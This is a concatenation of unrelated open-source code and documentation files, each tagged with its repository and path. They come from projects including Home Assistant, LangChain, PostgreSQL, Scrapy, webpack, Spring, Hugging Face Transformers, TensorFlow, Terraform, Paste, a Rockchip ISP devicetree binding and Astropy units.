    def __exit__(self, exc_type, exc_value, traceback):
        # Collect everything that changed while the block was running.
        for changed in self.hass.states.get_since(self.now):
            self.states.append(changed)
def reproduce_state(hass, states, blocking=False):
    """Call turn_on/turn_off services so entities match the given states.

    Accepts a single State or a list of them.  Entities whose current
    state is unknown, or whose target state is neither on nor off, are
    skipped (the latter with a warning).
    """
    if isinstance(states, State):
        states = [states]

    for state in states:
        # Skip entities Home Assistant does not currently know about.
        if hass.states.get(state.entity_id) is None:
            continue

        if state.state == STATE_ON:
            service = SERVICE_TURN_ON
        elif state.state == STATE_OFF:
            service = SERVICE_TURN_OFF
        else:
            _LOGGER.warning("Unable to reproduce state for %s", state)
            continue

        service_data = dict(state.attributes)
        service_data[ATTR_ENTITY_ID] = state.entity_id

        hass.services.call(state.domain, service, service_data, blocking)
|
unknown
|
codeparrot/codeparrot-clean
| ||
from typing import TYPE_CHECKING, Any
from langchain_classic._api import create_importer
if TYPE_CHECKING:
from langchain_community.tools import EdenAiTextToSpeechTool
# Create a way to dynamically look up deprecated imports.
# Used to consolidate logic for raising deprecation warnings and
# handling optional imports.
DEPRECATED_LOOKUP = {"EdenAiTextToSpeechTool": "langchain_community.tools"}

# Importer that resolves the names above from their new location and raises
# the appropriate deprecation warning on access.
_import_attribute = create_importer(__package__, deprecated_lookups=DEPRECATED_LOOKUP)


def __getattr__(name: str) -> Any:
    """Look up attributes dynamically (PEP 562 module-level __getattr__)."""
    return _import_attribute(name)


__all__ = [
    "EdenAiTextToSpeechTool",
]
|
python
|
github
|
https://github.com/langchain-ai/langchain
|
libs/langchain/langchain_classic/tools/edenai/audio_text_to_speech.py
|
/*-------------------------------------------------------------------------
*
* noblock.c
* set a file descriptor as blocking or non-blocking
*
* Portions Copyright (c) 1996-2026, PostgreSQL Global Development Group
* Portions Copyright (c) 1994, Regents of the University of California
*
* IDENTIFICATION
* src/port/noblock.c
*
*-------------------------------------------------------------------------
*/
#include "c.h"
#include <fcntl.h>
/*
 * Put socket into nonblock mode.
 * Returns true on success, false on failure.
 */
bool
pg_set_noblock(pgsocket sock)
{
#if !defined(WIN32)
	int			flags = fcntl(sock, F_GETFL);

	if (flags < 0)
		return false;
	return fcntl(sock, F_SETFL, flags | O_NONBLOCK) != -1;
#else
	/* Returns non-0 on failure, while fcntl() returns -1 on failure */
	unsigned long ioctlsocket_ret = 1;

	return (ioctlsocket(sock, FIONBIO, &ioctlsocket_ret) == 0);
#endif
}
/*
 * Put socket into blocking mode.
 * Returns true on success, false on failure.
 */
bool
pg_set_block(pgsocket sock)
{
#if !defined(WIN32)
	int			flags = fcntl(sock, F_GETFL);

	if (flags < 0)
		return false;
	return fcntl(sock, F_SETFL, flags & ~O_NONBLOCK) != -1;
#else
	/* Returns non-0 on failure, while fcntl() returns -1 on failure */
	unsigned long ioctlsocket_ret = 0;

	return (ioctlsocket(sock, FIONBIO, &ioctlsocket_ret) == 0);
#endif
}
|
c
|
github
|
https://github.com/postgres/postgres
|
src/port/noblock.c
|
"""
Scrapy Item
See documentation in docs/topics/item.rst
"""
from pprint import pformat
from collections import MutableMapping
from abc import ABCMeta
import six
from scrapy.utils.trackref import object_ref
class BaseItem(object_ref):
    """Base class for all scraped items."""
    # Marker base class only; object_ref (scrapy.utils.trackref) presumably
    # registers live instances for leak debugging -- see that module.
    pass
class Field(dict):
    """Container of field metadata"""
    # A plain dict subclass: arbitrary metadata keys, no predefined schema.
class ItemMeta(ABCMeta):
    """Metaclass of Item: collects Field class attributes into `fields`.

    A shadow class ('x_' + name) is created first so that Field attributes
    (including inherited ones) can be discovered via dir()/getattr(); the
    real class is then built with the collected `fields` dict and without
    the Field attributes themselves.
    """

    def __new__(mcs, class_name, bases, attrs):
        new_bases = tuple(base._class for base in bases if hasattr(base, '_class'))
        _class = super(ItemMeta, mcs).__new__(mcs, 'x_' + class_name, new_bases, attrs)

        # BUG FIX: getattr() here returns the *parent* class's fields dict;
        # mutating it in place leaked subclass fields into the parent.
        # Copy it so each class gets its own dict (inherited fields are
        # still picked up by the dir() loop below).
        fields = dict(getattr(_class, 'fields', {}))
        new_attrs = {}
        for n in dir(_class):
            v = getattr(_class, n)
            if isinstance(v, Field):
                fields[n] = v
            elif n in attrs:
                new_attrs[n] = attrs[n]

        new_attrs['fields'] = fields
        new_attrs['_class'] = _class
        return super(ItemMeta, mcs).__new__(mcs, class_name, bases, new_attrs)
class DictItem(MutableMapping, BaseItem):
    """Dict-like item whose allowed keys are restricted to `fields`.

    Values are stored in the private `_values` dict; `fields` (populated
    by ItemMeta from Field class attributes) acts as the schema: setting
    a key not declared in `fields` raises KeyError.
    """

    fields = {}

    def __init__(self, *args, **kwargs):
        self._values = {}
        if args or kwargs:  # avoid creating dict for most common case
            for k, v in six.iteritems(dict(*args, **kwargs)):
                self[k] = v

    def __getitem__(self, key):
        return self._values[key]

    def __setitem__(self, key, value):
        # Only keys declared as Field attributes may be stored.
        if key in self.fields:
            self._values[key] = value
        else:
            raise KeyError("%s does not support field: %s" %
                           (self.__class__.__name__, key))

    def __delitem__(self, key):
        del self._values[key]

    def __getattr__(self, name):
        # Field values are deliberately not reachable as attributes;
        # point the user at the mapping interface instead.
        if name in self.fields:
            raise AttributeError("Use item[%r] to get field value" % name)
        raise AttributeError(name)

    def __setattr__(self, name, value):
        # Only private attributes (e.g. _values) may be set directly.
        if not name.startswith('_'):
            raise AttributeError("Use item[%r] = %r to set field value" %
                                 (name, value))
        super(DictItem, self).__setattr__(name, value)

    def __len__(self):
        return len(self._values)

    def __iter__(self):
        return iter(self._values)

    # Mapping defines __eq__ and sets __hash__ to None; restore identity
    # hashing from BaseItem so items stay usable in sets/dicts.
    __hash__ = BaseItem.__hash__

    def keys(self):
        return self._values.keys()

    def __repr__(self):
        return pformat(dict(self))

    def copy(self):
        # Shallow copy: a new item of the same class with the same values.
        return self.__class__(self)
@six.add_metaclass(ItemMeta)
class Item(DictItem):
    # Concrete base for user-defined items: subclass and declare Field
    # attributes; ItemMeta collects them into `fields`.
    pass
|
unknown
|
codeparrot/codeparrot-clean
| ||
This example shows how to create an explicit vendor chunk as well as a common chunk for code shared among entry points. In this example, we have 3 entry points: `pageA`, `pageB`, and `pageC`. Those entry points share some of the same utility modules, but not others. This configuration will pull out any modules common to at least 2 bundles and place it in the `common` bundle instead, all while keeping the specified vendor libraries in their own bundle by themselves.
To better understand, here are the entry points and which utility modules they depend on:
- `pageA`
- `utility1`
- `utility2`
- `pageB`
- `utility2`
- `utility3`
- `pageC`
- `utility2`
- `utility3`
Given this configuration, webpack will produce the following bundles:
- `vendor`
- webpack runtime
- `vendor1`
- `vendor2`
- `common`
- `utility2`
- `utility3`
- `pageA`
- `pageA`
- `utility1`
- `pageB`
- `pageB`
- `pageC`
- `pageC`
With this bundle configuration, you would load your third party libraries, then your common application code, then your page-specific application code.
# webpack.config.js
```javascript
_{{webpack.config.js}}_
```
# dist/vendor.js
```javascript
_{{dist/vendor.js}}_
```
# dist/commons-utility2_js.js
```javascript
_{{dist/commons-utility2_js.js}}_
```
# dist/commons-utility3_js.js
```javascript
_{{dist/commons-utility3_js.js}}_
```
# dist/pageA.js
```javascript
_{{dist/pageA.js}}_
```
# dist/pageB.js
```javascript
_{{dist/pageB.js}}_
```
# dist/pageC.js
```javascript
_{{dist/pageC.js}}_
```
# Info
## Unoptimized
```
_{{stdout}}_
```
## Production mode
```
_{{production:stdout}}_
```
|
unknown
|
github
|
https://github.com/webpack/webpack
|
examples/common-chunk-and-vendor-chunk/template.md
|
/*
* Copyright 2002-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.scripting;
import org.springframework.beans.testfixture.beans.TestBean;
/**
* @author Juergen Hoeller
*/
public interface TestBeanAwareMessenger extends ConfigurableMessenger {

	/** Returns the TestBean held by this messenger. */
	TestBean getTestBean();

	/** Sets the TestBean to be held by this messenger. */
	void setTestBean(TestBean testBean);

}
|
java
|
github
|
https://github.com/spring-projects/spring-framework
|
spring-context/src/test/java/org/springframework/scripting/TestBeanAwareMessenger.java
|
<!---
Copyright 2020 The HuggingFace Team. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
⚠️ Note that this file is in Markdown but contain specific syntax for our doc-builder (similar to MDX) that may not be
rendered properly in your Markdown viewer.
-->
# Verificaciones en un Pull Request
Cuando abres un _pull request_ en 🤗 Transformers, se ejecutarán una serie de verificaciones para asegurarte de que el _patch_ que estás agregando no rompa nada existente. Estas verificaciones son de cuatro tipos:
- pruebas regulares
- creación de la documentación
- estilo del código y documentación
- consistencia del repositorio
En este documento, intentaremos explicar cuáles son esas diferentes verificaciones y el motivo detrás de ellas, así como también cómo depurarlas localmente si una falla en tu PR.
Recuerda que todas las verificaciones requieren que tengas una instalación de desarrollo:
```bash
pip install transformers[dev]
```
o una instalación editable:
```bash
pip install -e ".[dev]"
```
del repositorio de Transformers.
## Pruebas
Todos los procesos que comienzan con `ci/circleci: run_tests_` ejecutan partes del conjunto de pruebas de Transformers. Cada uno de esos procesos se enfoca en una parte de la biblioteca en un entorno determinado: por ejemplo, `ci/circleci: run_tests_pipelines_tf` ejecuta la prueba de _pipelines_ en un entorno donde solo está instalado TensorFlow.
Ten en cuenta que para evitar ejecutar pruebas cuando no hay un cambio real en los módulos que estás probando, solo se ejecuta una parte del conjunto de pruebas: se ejecuta una tarea auxiliar para determinar las diferencias en la biblioteca antes y después del PR (lo que GitHub te muestra en la pestaña "Files changes") y selecciona las pruebas afectadas por esa diferencia. Este auxiliar se puede ejecutar localmente usando:
```bash
python utils/tests_fetcher.py
```
desde el directorio raíz del repositorio de Transformers. Se ejecutará lo siguiente:
1. Verificación para cada archivo en el _diff_ si los cambios están en el código, solo en comentarios o _docstrings_. Solo los archivos con cambios reales de código se conservan.
2. Creación de un mapa interno que proporciona para cada archivo del código fuente de la biblioteca todos los archivos a los que impacta recursivamente. Se dice que el módulo A impacta al módulo B si el módulo B importa el módulo A. Para el impacto recursivo, necesitamos una cadena de módulos que va del módulo A al módulo B en la que cada módulo importa el anterior.
3. Aplicación de este mapa en los archivos recopilados en el paso 1, lo que nos da una lista de archivos modelo afectados por el PR.
4. Asignación de cada uno de esos archivos a sus archivos de prueba correspondientes para obtener la lista de pruebas a ejecutar.
Al ejecutar el _script_ localmente, debes obtener los resultados de los pasos 1, 3 y 4 impresos y así saber qué pruebas se ejecutarán. El _script_ también creará un archivo llamado `test_list.txt` que contiene la lista de pruebas para ejecutar, y puedes ejecutarlas localmente con el siguiente comando:
```bash
python -m pytest -n 8 --dist=loadfile -rA -s $(cat test_list.txt)
```
En caso de que se te escape algo, el conjunto completo de pruebas también se ejecuta a diario.
## Creación de la documentación
El proceso `build_pr_documentation` compila y genera una vista previa de la documentación para asegurarse de que todo se vea bien una vez que se fusione tu PR. Un bot agregará un enlace para obtener una vista previa de la documentación en tu PR. Cualquier cambio que realices en el PR se actualiza automáticamente en la vista previa. Si la documentación no se genera, haz clic en **Detalles** junto al proceso fallido para ver dónde salió mal. A menudo, el error es tan simple como que falta un archivo en `toctree`.
Si estás interesado en compilar u obtener una vista previa de la documentación localmente, echa un vistazo al [`README.md`](https://github.com/huggingface/transformers/tree/main/docs) en la carpeta `docs`.
## Estilo de código y documentación.
El formato de código se aplica a todos los archivos fuente, los ejemplos y las pruebas utilizando `black` y `ruff`. También tenemos una herramienta personalizada que se ocupa del formato de los _docstrings_ y archivos `rst` (`utils/style_doc.py`), así como del orden de las importaciones _lazy_ realizadas en los archivos `__init__.py` de Transformers (`utils/custom_init_isort.py`). Todo esto se puede probar ejecutando
```bash
make style
```
CI verifica que se hayan aplicado dentro de la verificación `ci/circleci: check_code_quality`. También se ejecuta `ruff`, que hará una verificación básica a tu código y te hará saber si encuentra una variable no definida, o una que no se usa. Para ejecutar esa verificación localmente, usa
```bash
make check-repo
```
Este último comando también ejecutará todas las verificaciones adicionales para la consistencia del repositorio. Echemos un vistazo a estas pruebas.
## Consistencia del repositorio
Esta verificación reagrupa todas las pruebas para asegurarse de que tu PR deja el repositorio en buen estado, y se realiza mediante `ci/circleci: check_repository_consistency`. Puedes ejecutar localmente esta verificación ejecutando lo siguiente:
```bash
make check-repo
```
Esta instrucción verifica que:
- Todos los objetos agregados al _init_ están documentados (realizados por `utils/check_repo.py`)
- Todos los archivos `__init__.py` tienen el mismo contenido en sus dos secciones (realizado por `utils/check_inits.py`)
- Todo el código identificado como una copia de otro módulo es consistente con el original (realizado por `utils/check_copies.py`)
- Todas las clases de configuración tienen al menos un _checkpoint_ válido mencionado en sus _docstrings_ (realizado por `utils/check_config_docstrings.py`)
- Las traducciones de los README y el índice del documento tienen la misma lista de modelos que el README principal (realizado por `utils/check_copies.py`)
- Las tablas generadas automáticamente en la documentación están actualizadas (realizadas por `utils/check_table.py`)
- La biblioteca tiene todos los objetos disponibles incluso si no están instaladas todas las dependencias opcionales (realizadas por `utils/check_dummies.py`)
Si esta verificación falla, los primeros dos elementos requieren una reparación manual, los últimos cuatro pueden repararse automáticamente ejecutando el comando
```bash
make fix-repo
```
Las verificaciones adicionales se refieren a los PRs que agregan nuevos modelos, principalmente que:
- Todos los modelos agregados están en un Auto-mapping (realizado por `utils/check_repo.py`)
<!-- TODO Sylvain, add a check that makes sure the common tests are implemented.-->
- Todos los modelos se verifican correctamente (realizados por `utils/check_repo.py`)
<!-- TODO Sylvain, add the following
- All models are added to the main README, inside the main doc
- All checkpoints used actually exist on the Hub
-->
|
unknown
|
github
|
https://github.com/huggingface/transformers
|
docs/source/es/pr_checks.md
|
/* Copyright 2022 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_COMPILER_JIT_DEVICE_COMPILER_CLIENT_H_
#define TENSORFLOW_COMPILER_JIT_DEVICE_COMPILER_CLIENT_H_
#include <optional>
#include <string>
#include <variant>
#include "tensorflow/compiler/tf2xla/xla_compiler.h"
#include "xla/client/executable_build_options.h"
namespace tensorflow {
// Interface for a compiler client that can build, serialize and load
// compiled executables. `ExecutableType` is the compiled-artifact type and
// `ClientType` the backend client used to produce it.
//
// All compilation entry points return `absl::StatusOr` consistently (the
// original mixed the `StatusOr` alias and `absl::StatusOr`; they are the
// same type, so overriders are unaffected).
template <typename ExecutableType, typename ClientType>
class DeviceCompilerClient {
 public:
  DeviceCompilerClient() = default;
  virtual ~DeviceCompilerClient() = default;

  // Compiles `result` (HLO) to an `ExecutableType` using `ClientType` and
  // returns it.
  virtual absl::StatusOr<std::unique_ptr<ExecutableType>> BuildExecutable(
      const XlaCompiler::Options& options,
      const XlaCompiler::CompilationResult& result) = 0;

  // Serializes an available `executable` to string using `ClientType` and
  // returns it.
  virtual absl::StatusOr<std::string> SerializeExecutable(
      const ExecutableType& executable) = 0;

  // Compiles `result` (HLO) to a serializable executable (eg.
  // xla::AotCompilationResult) using `ClientType`, serializes it to string and
  // returns it.
  virtual absl::StatusOr<std::string> BuildSerializedExecutable(
      const XlaCompiler::Options& options,
      const XlaCompiler::CompilationResult& result) = 0;

  // Loads `serialized_executable` into an `ExecutableType` using `ClientType`;
  // `options` and `result` supply the compilation metadata needed to
  // reconstruct it.
  virtual absl::StatusOr<std::unique_ptr<ExecutableType>> LoadExecutable(
      const XlaCompiler::Options& options,
      const XlaCompiler::CompilationResult& result,
      const std::string& serialized_executable) = 0;

  // Waits for the underlying `ClientType` backend's programs to finish
  // executing before returning.
  virtual void WaitForProgramsToFinish() = 0;

  virtual ClientType* client() const = 0;

 private:
  // Non-copyable: instances own backend state.
  DeviceCompilerClient(const DeviceCompilerClient&) = delete;
  void operator=(const DeviceCompilerClient&) = delete;
};
// Generates the ExecutableBuildOptions for compilation from HLO to
// executable. `default_device_ordinal` is presumably the ordinal to fall
// back to when `options` does not pin a device — confirm in the
// implementation.
xla::ExecutableBuildOptions GetExecutableBuildOptions(
    const XlaCompiler::Options& options,
    const XlaCompiler::CompilationResult& result, int default_device_ordinal);
} // namespace tensorflow
#endif // TENSORFLOW_COMPILER_JIT_DEVICE_COMPILER_CLIENT_H_
|
c
|
github
|
https://github.com/tensorflow/tensorflow
|
tensorflow/compiler/jit/device_compiler_client.h
|
// Copyright (c) HashiCorp, Inc.
// SPDX-License-Identifier: BUSL-1.1
package workdir
import (
"path/filepath"
)
// NormalizePath attempts to transform the given path so that it's relative
// to the working directory, which is our preferred way to present and store
// paths to files and directories within a configuration so that they can
// be portable to operations in other working directories.
//
// It isn't always possible to produce a relative path. For example, on Windows
// the given path might be on a different volume (e.g. drive letter or network
// share) than the working directory.
//
// Note that the result will be relative to the main directory of the receiver,
// which should always be the actual process working directory in normal code,
// but might be some other temporary working directory when in test code.
// If you need to access the file or directory that the result refers to with
// functions that aren't aware of our base directory, you can use something
// like the following, which again should be needed only in test code which
// might need to inspect the filesystem in order to make assertions:
//
// filepath.Join(d.RootModuleDir(), normalizePathResult)
//
// The above is suitable only for situations where the given path is known
// to be beneath the working directory, which is the typical situation for
// temporary working directories created for automated tests.
func (d *Dir) NormalizePath(given string) string {
	// filepath.Rel only gives a reliable answer against an absolute base.
	base, err := filepath.Abs(d.mainDir)
	if err != nil {
		// We can't resolve the working directory at all; the best we can
		// do is hand back a cleaned copy of the input.
		return filepath.Clean(given)
	}

	target := given
	if !filepath.IsAbs(target) {
		target = filepath.Join(base, target)
	}

	rel, err := filepath.Rel(base, target)
	if err != nil {
		// A relative path doesn't always exist: on Windows the target may
		// live on a different volume (drive letter or network share),
		// which can only be described with an absolute path.
		return filepath.Clean(target)
	}
	return rel
}
|
go
|
github
|
https://github.com/hashicorp/terraform
|
internal/command/workdir/normalize_path.go
|
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
from six.moves import cStringIO as StringIO
import traceback
import threading
import pdb
import six
import sys
# Serializes exec_expr() calls: each evaluation swaps process-global state
# (sys.stdout, pdb.set_trace), so only one may run at a time.
exec_lock = threading.Lock()
class EvalContext(object):
    """
    Class that represents an interactive interface.  It has its own
    namespace.  Use eval_context.exec_expr(expr) to run commands; the
    output of those commands is returned, as are print statements.
    This is essentially what doctest does, and is taken directly from
    doctest.
    """
    def __init__(self, namespace, globs):
        # `namespace` collects bindings made by executed code; `globs`
        # supplies the globals that code runs against.
        self.namespace = namespace
        self.globs = globs
    def exec_expr(self, s):
        """Execute the source string `s`; return everything it printed."""
        out = StringIO()
        # `with` guarantees the lock is released on every exit path
        # (the original paired manual acquire()/release() calls).
        with exec_lock:
            save_stdout = sys.stdout
            try:
                debugger = _OutputRedirectingPdb(save_stdout)
                debugger.reset()
                pdb.set_trace = debugger.set_trace
                sys.stdout = out
                try:
                    code = compile(s, '<web>', "single", 0, 1)
                    six.exec_(code, self.globs, self.namespace)
                    debugger.set_continue()
                except KeyboardInterrupt:
                    raise
                except:
                    # Deliberately bare: any other error (including
                    # SystemExit) is rendered into the captured output
                    # rather than propagated to the server.
                    traceback.print_exc(file=out)
                    debugger.set_continue()
            finally:
                sys.stdout = save_stdout
        return out.getvalue()
# From doctest
class _OutputRedirectingPdb(pdb.Pdb):
"""
A specialized version of the python debugger that redirects stdout
to a given stream when interacting with the user. Stdout is *not*
redirected when traced code is executed.
"""
def __init__(self, out):
self.__out = out
pdb.Pdb.__init__(self)
def trace_dispatch(self, *args):
# Redirect stdout to the given stream.
save_stdout = sys.stdout
sys.stdout = self.__out
# Call Pdb's trace dispatch method.
try:
return pdb.Pdb.trace_dispatch(self, *args)
finally:
sys.stdout = save_stdout
|
unknown
|
codeparrot/codeparrot-clean
| ||
# SPDX-License-Identifier: (GPL-2.0+ OR MIT)
%YAML 1.2
---
$id: http://devicetree.org/schemas/media/rockchip-isp1.yaml#
$schema: http://devicetree.org/meta-schemas/core.yaml#
title: Rockchip SoC Image Signal Processing unit v1
maintainers:
- Helen Koike <helen.koike@collabora.com>
description: |
Rockchip ISP1 is the Camera interface for the Rockchip series of SoCs
which contains image processing, scaling, and compression functions.
properties:
compatible:
enum:
- fsl,imx8mp-isp
- rockchip,px30-cif-isp
- rockchip,rk3399-cif-isp
reg:
maxItems: 1
interrupts:
minItems: 1
maxItems: 3
interrupt-names:
items:
- const: isp
- const: mi
- const: mipi
clocks:
minItems: 3
items:
# isp0 and isp1
- description: ISP clock (for imx8mp, clk)
- description: ISP AXI clock (for imx8mp, m_hclk)
- description: ISP AHB clock (for imx8mp, hclk)
# only for isp1
- description: ISP Pixel clock
clock-names:
minItems: 3
items:
# isp0 and isp1
- const: isp
- const: aclk
- const: hclk
# only for isp1
- const: pclk
fsl,blk-ctrl:
$ref: /schemas/types.yaml#/definitions/phandle-array
maxItems: 1
description:
A phandle to the media block control for the ISP, followed by a cell
containing the index of the gasket.
iommus:
maxItems: 1
phys:
maxItems: 1
description: phandle for the PHY port
phy-names:
const: dphy
power-domains:
minItems: 1
items:
- description: ISP power domain
- description: MIPI CSI-2 power domain
power-domain-names:
minItems: 1
items:
- const: isp
- const: csi2
ports:
$ref: /schemas/graph.yaml#/properties/ports
properties:
port@0:
$ref: /schemas/graph.yaml#/$defs/port-base
unevaluatedProperties: false
description: connection point for sensors at MIPI-DPHY RX0
properties:
endpoint:
$ref: video-interfaces.yaml#
unevaluatedProperties: false
properties:
data-lanes:
minItems: 1
maxItems: 4
port@1:
$ref: /schemas/graph.yaml#/$defs/port-base
unevaluatedProperties: false
description: connection point for input on the parallel interface
properties:
endpoint:
$ref: video-interfaces.yaml#
unevaluatedProperties: false
properties:
bus-type:
enum: [5, 6]
required:
- bus-type
anyOf:
- required:
- port@0
- required:
- port@1
required:
- compatible
- reg
- interrupts
- clocks
- clock-names
- power-domains
- ports
allOf:
- if:
properties:
compatible:
contains:
const: rockchip,rk3399-cif-isp
then:
properties:
clocks:
minItems: 3
maxItems: 4
clock-names:
minItems: 3
maxItems: 4
- if:
properties:
compatible:
contains:
const: rockchip,px30-cif-isp
then:
required:
- interrupt-names
- if:
properties:
compatible:
contains:
const: fsl,imx8mp-isp
then:
properties:
clocks:
minItems: 4
clock-names:
minItems: 4
iommus: false
phys: false
phy-names: false
power-domains:
minItems: 2
power-domain-names:
minItems: 2
required:
- fsl,blk-ctrl
- power-domain-names
else:
properties:
fsl,blk-ctrl: false
power-domains:
maxItems: 1
power-domain-names: false
required:
- iommus
- phys
- phy-names
additionalProperties: false
examples:
- |
#include <dt-bindings/clock/rk3399-cru.h>
#include <dt-bindings/interrupt-controller/arm-gic.h>
#include <dt-bindings/power/rk3399-power.h>
parent0: parent {
#address-cells = <2>;
#size-cells = <2>;
isp0: isp0@ff910000 {
compatible = "rockchip,rk3399-cif-isp";
reg = <0x0 0xff910000 0x0 0x4000>;
interrupts = <GIC_SPI 43 IRQ_TYPE_LEVEL_HIGH 0>;
clocks = <&cru SCLK_ISP0>,
<&cru ACLK_ISP0_WRAPPER>,
<&cru HCLK_ISP0_WRAPPER>;
clock-names = "isp", "aclk", "hclk";
iommus = <&isp0_mmu>;
phys = <&dphy>;
phy-names = "dphy";
power-domains = <&power RK3399_PD_ISP0>;
ports {
#address-cells = <1>;
#size-cells = <0>;
port@0 {
reg = <0>;
#address-cells = <1>;
#size-cells = <0>;
mipi_in_wcam: endpoint@0 {
reg = <0>;
remote-endpoint = <&wcam_out>;
data-lanes = <1 2>;
};
mipi_in_ucam: endpoint@1 {
reg = <1>;
remote-endpoint = <&ucam_out>;
data-lanes = <1>;
};
};
};
};
i2c7: i2c {
#address-cells = <1>;
#size-cells = <0>;
wcam: camera@36 {
compatible = "ovti,ov5695";
reg = <0x36>;
clocks = <&cru SCLK_TESTCLKOUT1>;
port {
wcam_out: endpoint {
remote-endpoint = <&mipi_in_wcam>;
data-lanes = <1 2>;
};
};
};
ucam: camera@3c {
compatible = "ovti,ov2685";
reg = <0x3c>;
clocks = <&cru SCLK_TESTCLKOUT1>;
clock-names = "xvclk";
avdd-supply = <&pp2800_cam>;
dovdd-supply = <&pp1800>;
dvdd-supply = <&pp1800>;
port {
ucam_out: endpoint {
remote-endpoint = <&mipi_in_ucam>;
data-lanes = <1>;
};
};
};
};
};
- |
#include <dt-bindings/interrupt-controller/arm-gic.h>
#include <dt-bindings/power/px30-power.h>
parent1: parent {
#address-cells = <2>;
#size-cells = <2>;
isp: isp@ff4a0000 {
compatible = "rockchip,px30-cif-isp";
reg = <0x0 0xff4a0000 0x0 0x8000>;
interrupts = <GIC_SPI 70 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 73 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 74 IRQ_TYPE_LEVEL_HIGH>;
interrupt-names = "isp", "mi", "mipi";
clocks = <&cru SCLK_ISP0>,
<&cru ACLK_ISP0_WRAPPER>,
<&cru HCLK_ISP0_WRAPPER>,
<&cru PCLK_ISP1_WRAPPER>;
clock-names = "isp", "aclk", "hclk", "pclk";
iommus = <&isp_mmu>;
phys = <&csi_dphy>;
phy-names = "dphy";
power-domains = <&power PX30_PD_VI>;
ports {
#address-cells = <1>;
#size-cells = <0>;
port@0 {
reg = <0>;
#address-cells = <1>;
#size-cells = <0>;
mipi_in_ucam1: endpoint@0 {
reg = <0>;
remote-endpoint = <&ucam1_out>;
data-lanes = <1 2>;
};
};
};
};
i2c2: i2c {
#address-cells = <1>;
#size-cells = <0>;
ov5695: camera@36 {
compatible = "ovti,ov5647";
reg = <0x36>;
clocks = <&cru SCLK_CIF_OUT>;
port {
ucam1_out: endpoint {
remote-endpoint = <&mipi_in_ucam1>;
data-lanes = <1 2>;
};
};
};
};
};
|
unknown
|
github
|
https://github.com/torvalds/linux
|
Documentation/devicetree/bindings/media/rockchip-isp1.yaml
|
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Core units classes and functions
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from ..extern import six
from ..extern.six.moves import zip
import inspect
import operator
import textwrap
import warnings
import numpy as np
from ..utils.decorators import lazyproperty, deprecated
from ..utils.exceptions import AstropyWarning
from ..utils.misc import isiterable, InheritDocstrings
from .utils import (is_effectively_unity, sanitize_scale, validate_power,
resolve_fractions)
from . import format as unit_format
if six.PY2:
import cmath
__all__ = [
'UnitsError', 'UnitsWarning', 'UnitConversionError', 'UnitTypeError',
'UnitBase', 'NamedUnit', 'IrreducibleUnit', 'Unit', 'CompositeUnit',
'PrefixUnit', 'UnrecognizedUnit', 'def_unit', 'get_current_unit_registry',
'set_enabled_units', 'add_enabled_units',
'set_enabled_equivalencies', 'add_enabled_equivalencies',
'dimensionless_unscaled', 'one']
def _flatten_units_collection(items):
    """
    Return a flat `set` of all units found in ``items``, which may be a
    single unit or a list of sequences, modules or dictionaries of units.
    """
    result = set()
    for item in (items if isinstance(items, list) else [items]):
        if isinstance(item, UnitBase):
            result.add(item)
            continue
        # Work out where the candidate units live inside this container.
        if isinstance(item, dict):
            candidates = item.values()
        elif inspect.ismodule(item):
            candidates = vars(item).values()
        elif isiterable(item):
            candidates = item
        else:
            # Not a unit and not a recognized container: skip silently.
            continue
        result.update(u for u in candidates if isinstance(u, UnitBase))
    return result
def _normalize_equivalencies(equivalencies):
    """
    Normalizes equivalencies, ensuring each is a 4-tuple of the form::
        (from_unit, to_unit, forward_func, backward_func)
    Parameters
    ----------
    equivalencies : list of equivalency pairs
    Raises
    ------
    ValueError if an equivalency cannot be interpreted
    """
    if equivalencies is None:
        return []
    normalized = []
    for index, entry in enumerate(equivalencies):
        size = len(entry)
        if size == 2:
            funit, tunit = entry
            forward = backward = lambda x: x
        elif size == 3:
            funit, tunit, forward = entry
            backward = forward
        elif size == 4:
            funit, tunit, forward, backward = entry
        else:
            raise ValueError(
                "Invalid equivalence entry {0}: {1!r}".format(index, entry))
        # Units must round-trip through Unit() unchanged and both
        # converters must be callable; anything else is malformed.
        if not (funit is Unit(funit) and
                (tunit is None or tunit is Unit(tunit)) and
                six.callable(forward) and
                six.callable(backward)):
            raise ValueError(
                "Invalid equivalence entry {0}: {1!r}".format(index, entry))
        normalized.append((funit, tunit, forward, backward))
    return normalized
class _UnitRegistry(object):
    """
    Manages a registry of the enabled units.
    Tracks the set of enabled units (plus several indexes over them) and
    the set of enabled equivalencies.
    """
    def __init__(self, init=[], equivalencies=[]):
        # NOTE: the mutable default arguments are safe here because both
        # are only read, never mutated.
        if isinstance(init, _UnitRegistry):
            # If passed another registry we don't need to rebuild everything.
            # but because these are mutable types we don't want to create
            # conflicts so everything needs to be copied.
            self._equivalencies = init._equivalencies.copy()
            self._all_units = init._all_units.copy()
            self._registry = init._registry.copy()
            self._non_prefix_units = init._non_prefix_units.copy()
            # The physical type is a dictionary containing sets as values.
            # All of these must be copied otherwise we could alter the old
            # registry.
